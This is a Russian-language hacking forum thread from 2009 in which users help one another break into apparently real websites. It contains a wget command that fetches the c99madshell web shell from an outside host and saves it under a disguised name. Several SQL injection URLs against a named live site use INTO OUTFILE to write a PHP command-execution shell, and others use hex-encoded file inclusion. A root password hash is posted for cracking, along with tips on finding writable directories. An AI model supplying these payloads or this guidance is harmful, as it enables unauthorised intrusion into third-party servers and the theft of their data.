Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Мда уж... И зачем умничать? Это по-детски как-то. Честно, как ребенок говоришь...

    547, я тебе уже в личке объяснял, еще раз напишу полный и рабочий пример использования wget
    Code:
    wget http://madnet.name/files/download/9_c99madshell.php -O c99madshell.php
    В даном случае wget скачает файл, который находится по адресу http://madnet.name/files/download/9_c99madshell.php в файл c99madshell.php, который будет находится в текущей директории, т.е. в директории с которой был запущен wget. Если необходимо загрузить в отличную от текущей директорию, достаточно вместо c99madshell.php написать полный путь к файлу, н.п.
    Code:
    /var/www/images/smiles/smile.php
    А вообще, читай
    http://linux.about.com/od/commands/l/blcmdl1_wget.htm
     
    1 person likes this.
  2. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    Подскажите файлохранлище с ПРЯМОЙ ссылкой на файл.
     
  3. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    Для меня лучший обменник - filehoster.Ru.
    а так советую зарегать хост к примеру на юкозе, и туда лить файлы
     
    1 person likes this.
  4. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    мне нужно чтобы wget'ом качнуть потом можно было,прямая ссылка как я написал,без всяких подтверждений
     
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    регить сайт на народе - 1 мин.
     
  6. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    Здравствуйте.
    1.Подскажите пожалуйста, есть сайт с инъекцией http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,2,3,4,5,6--
    Как можно залить шелл?

    http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,'<? php system($_GET[cmd]); ?>',3,4,5,6 INTO OUTFILE 'D:/www/shell.php'-- ничего не получается

    http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,0x3c3f207068702073797374656d2 8245f4745545b636d645d293b203f3e,3,4,5,6 INTO OUTFILE 'D:/www/shell.php' так же них нету
     
  7. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    кавычки экранируются. Облом с аутфайлом в общем.
    Можешь хеш расшифровать к юзеру рут =)
    root:C705FA72189D628A3657C885B0668778976F72E4
     
    #10367 p.r0phe.t, 1 Dec 2009
    Last edited: 1 Dec 2009
  8. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    спс, а сам запрос верно написал?
     
  9. Totgeliebt

    Totgeliebt New Member

    Joined:
    20 Oct 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    0
    что можно с этим сделать?
    Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 3699224 bytes) in /home/gamer/public_html/messages.php on line 411
     
  10. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Ну теперь ты знаеш полный путь.
    А это переполнение разрешенной памяти вроде :(
     
  11. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    на народе помоему капчу ввели для скачивания.
     
  12. Totgeliebt

    Totgeliebt New Member

    Joined:
    20 Oct 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    0
    а для чего это может пригодится? :D
     
  13. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Полный путь,например для заливки шела через sql-inj.
     
  14. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    Спасибо, если можно разъясните что такое пма, или ссылку дайте.
     
  15. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    root@localhost

    file_priv Y

    into outfile & load_file рабаотает...
    но когда даю такой запрос пишет:

    Ошибка в параметрах запроса

    http://site.ru/index.php?cat=1-1%20union%20select%201,2,3,4,'%3C?php%20system($_GET[cmd]);%20?%3E',6,7,8,9,10,11,12,13,14+into+outfile+'/var/www/kvartirant/data/www/kvartira.ru/shell.php'/*

    но какая тут ошибка? путь найшол вроде все правильно в tmp записывалось нормально....

    может отсутствуют права на запись в директорию сайта?
     
  16. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    я не вкурил какие линки на шеллы? О_о у меня до сих пор все живое))уже как 1 час гдето

    PSSSS самое прикольное что там RFI\LFI по сути))))тока там отключенно удаленное(забыл как она называется, сбудуна просто сижу, экз сдал :D )

    в 3.4.6 колонках если 0xhex вставить то инклудь что хочеш на нем, тока есть косяка / поэтому в 3 колонке hex путей а в 4 уже hex файла ))

    http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,2,0x443a5c7777775c7275,0x70616765732e706870,5,6
     
    _________________________
    #10376 HAXTA4OK, 1 Dec 2009
    Last edited: 1 Dec 2009
  17. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    http://site.ru/index.php?cat=1-1%20union%20select%201,2,3,4,'%3C?php%20system($_G ET[cmd]);%20?%3E',6,7,8,9,10,11,12,13,14+into+outfile+'/var/www/kvartirant/data/www/kvartira.ru/shell.php'/*
    уматно сайт спрятал =))
     
  18. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    kvartira.ru -это не настоящее имя сайта))))
    сайт спрятал более менее надежно... ато турки сам знаеш)))
     
  19. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    Поищи папки на запись и не думай что когда выполниш запрос то у тебя не вылезит какая нить ошибка, то есть ошибка может и вылезит, но файл создаться, но как я понял ты его прямо в корень сайта пихаеш, поищи папку с картинками
     
    _________________________
  20. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    ты вчера помог! тебе могу настоящее имя кинуть в лс))) только в паблик сразу некидай...
     
Thread Status:
Not open for further replies.